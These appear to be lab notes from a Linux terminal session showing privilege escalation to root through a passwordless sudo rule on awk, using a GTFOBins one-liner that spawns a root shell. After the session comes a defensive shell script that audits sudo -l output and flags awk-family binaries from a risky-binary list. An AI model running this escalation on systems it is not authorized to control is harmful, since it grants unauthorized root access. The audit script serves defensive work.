SUDO
dsu@dsu-vm:~$ whoami
dsu
dsu@dsu-vm:~$ sudo -l
Matching Defaults entries for dsu on dsu-vm:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/bin\:/snap/
User dsu may run the following commands on dsu-vm:
(ALL) NOPASSWD: /usr/bin/awk
dsu@dsu-vm:~$ which awk
/usr/bin/awk
dsu@dsu-vm:~$ ls -l /usr/bin/awk
lrwxrwxrwx 1 root root 21 Jan 11 2019 /usr/bin/awk -> /etc/alternatives/awk
root@oco:~$ BROWSER > https://gtfobins.github.io/
search: awk
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated
privileges and may be used to access the file system, escalate or maintain
privileged access.
sudo awk 'BEGIN {system("/bin/sh")}'
* ALT: sudo awk 'BEGIN {system("/bin/bash")}'
dsu@dsu-vm:~$ sudo awk 'BEGIN {system("/bin/bash")}'
root@dsu-vm:~# whoami
root
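
The defender's side of the same finding, as an added example that is not part of the original notes or of GTFOBins: a shell function that reads `sudo -l` output and flags rules granting the awk family, following the symlink the way the `ls -l` step above does. RISKY_BINS, the function names and the second sample rule are assumptions made for the example.

```shell
#!/bin/sh
# Added example: audit `sudo -l` output for rules granting an awk interpreter.
# RISKY_BINS is an assumption limited to the awk family seen on this page.
RISKY_BINS="awk gawk mawk nawk"

# Constructed sample: the rule from the session above plus one benign rule.
sample_sudo_l() {
    cat <<'EOF'
User dsu may run the following commands on dsu-vm:
    (ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/systemctl status nginx
EOF
}

# Reads `sudo -l` output on stdin, prints one FINDING line per risky rule.
audit_sudo_l() {
    while IFS= read -r line; do
        line=${line#"${line%%[![:space:]]*}"}         # trim leading whitespace
        case "$line" in "("*) ;; *) continue ;; esac  # rule lines start with (runas)
        rest=${line#*") "}                            # drop the run-as spec
        case "$rest" in */*) ;; *) continue ;; esac   # only rules naming a path
        nopasswd=no
        case "$rest" in *NOPASSWD:*) nopasswd=yes ;; esac
        cmd="/${rest#*/}"                             # drop tags such as NOPASSWD:
        path=${cmd%% *}
        # A rule with no argument list lets the caller pass any arguments.
        if [ "$path" = "$cmd" ]; then args=unrestricted; else args=restricted; fi
        # Follow symlinks such as /usr/bin/awk -> /etc/alternatives/awk.
        resolved=$(readlink -f "$path" 2>/dev/null) || resolved=$path
        [ -n "$resolved" ] || resolved=$path
        hit=""
        for b in $RISKY_BINS; do
            if [ "${path##*/}" = "$b" ] || [ "${resolved##*/}" = "$b" ]; then hit=$b; fi
        done
        [ -n "$hit" ] || continue
        printf 'FINDING: %s -> %s nopasswd=%s args=%s\n' "$path" "$resolved" "$nopasswd" "$args"
    done
    return 0
}

# Stand-alone run on the constructed sample.
sample_sudo_l | audit_sudo_l
```

On a host, run it as `sudo -l | audit_sudo_l`; a finding with args=unrestricted means the rule should be removed or narrowed to a fixed command line.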